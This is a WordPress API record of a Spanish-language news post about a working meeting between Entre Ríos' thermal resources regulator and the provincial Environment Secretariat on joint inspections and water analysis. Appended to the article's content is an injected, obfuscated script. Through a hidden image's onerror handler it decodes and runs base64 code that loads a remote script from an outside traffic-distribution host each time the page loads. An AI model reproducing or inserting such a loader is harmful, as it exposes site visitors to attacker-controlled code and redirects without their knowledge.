{"id":8582,"date":"2024-08-21T13:31:19","date_gmt":"2024-08-21T16:31:19","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8582"},"modified":"2025-08-13T15:39:44","modified_gmt":"2025-08-13T18:39:44","slug":"el-ente-regulador-de-recursos-termales-y-la-secretaria-de-ambiente-definieron-pautas-de-trabajo-conjunto","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8582","title":{"rendered":"El Ente Regulador de recursos termales y la Secretar\u00eda de Ambiente definieron pautas de trabajo conjunto"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-a19a793b331d80fb4d7d5c43e8f97eff\" style=\"background-color:#0668a1\"><em>El Presidente del Ente Regulador de los Recursos Termales de Entre R\u00edos, Prof. Aldo Monta\u00f1ana, recibi\u00f3 a funcionarios de la Secretar\u00eda de Ambiente provincial con motivo de realizar una reuni\u00f3n de trabajo en la sede del Errter con las respectivas \u00e1reas t\u00e9cnicas y legales de cada sector gubernamental.<\/em><\/h3>\n\n\n\n<p>Entre otros temas, fue analizada la posibilidad de establecer de manera conjunta entre ambas reparticiones una metodolog\u00eda de inspecciones y de diferentes mecanismos de control a los establecimientos termales, dedic\u00e1ndose el ente regulador al monitoreo del recurso termal extra\u00eddo y al residual, en tanto que, desde Ambiente, atender a controles anexos a los del Errter y tambi\u00e9n relevar impactos en \u00e1reas de influencia de las explotaciones.<\/p>\n\n\n\n<p>Del mismo modo, tambi\u00e9n se refirieron a la posibilidad que desde el laboratorio de aguas que pondr\u00eda en marcha la Secretar\u00eda de Ambiente en Concepci\u00f3n del Uruguay se realicen an\u00e1lisis f\u00edsico qu\u00edmico, bacteriol\u00f3gicos y de potabilidad del recurso termal, para mantener actualizado banco de informaci\u00f3n existente en el Ente respecto a su calidad, cantidad y diversidad.<\/p>\n\n\n\n<p>Acompa\u00f1aron al Prof. Monta\u00f1ana en el encuentro el Jefe del \u00c1rea T\u00e9cnica, Dr. Daniel M\u00e1rsico, y el asesor legal del Errter, Dr. Ariel Amarillo. En tanto que por la Secretar\u00eda de Ambiente estuvieron presentes el Director Legal y de Gesti\u00f3n Ambiental del Agua, Dr. Osvaldo Fern\u00e1ndez; el Coordinador de Gesti\u00f3n y Administraci\u00f3n Costa del Uruguay, Prof. Alberto Zapata; y el Director General de Ambiente y Cambio Clim\u00e1tico, Lic. Maximiliano G\u00f3mez.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.facebook.com\/entetermal.entrerios\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/scontent.fsla1-1.fna.fbcdn.net\/v\/t39.30808-6\/414978386_7080742895297640_5374099614839273327_n.jpg?_nc_cat=103&amp;ccb=1-7&amp;_nc_sid=6ee11a&amp;_nc_eui2=AeFCzLi318t0uX90GsvxVwHF_hbqUGyZ7Jb-FupQbJnsltufSqoloexFiMYJa3hcu08bZCcp4fwXvmurakWb-czJ&amp;_nc_ohc=kLBlXhaf0q8Q7kNvgF4ljbS&amp;_nc_ht=scontent.fsla1-1.fna&amp;oh=00_AYC4NUqXOYIi9P_1udOdmMz-5ugqh2x9j_G6MPO1YnJU3w&amp;oe=66CBE684\" alt=\"\" style=\"width:117px;height:auto\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Presidente del Ente Regulador de los Recursos Termales de Entre R\u00edos, Prof. Aldo Monta\u00f1ana, recibi\u00f3 a funcionarios de la Secretar\u00eda de Ambiente provincial con motivo de realizar una reuni\u00f3n de trabajo en la sede del Errter con las respectivas \u00e1reas t\u00e9cnicas y legales de cada sector gubernamental. Entre otros temas, fue analizada la posibilidad [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8586,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-8582","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8582","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8582"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8582\/revisions"}],"predecessor-version":[{"id":10101,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8582\/revisions\/10101"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8586"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8582"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8582"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8582"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}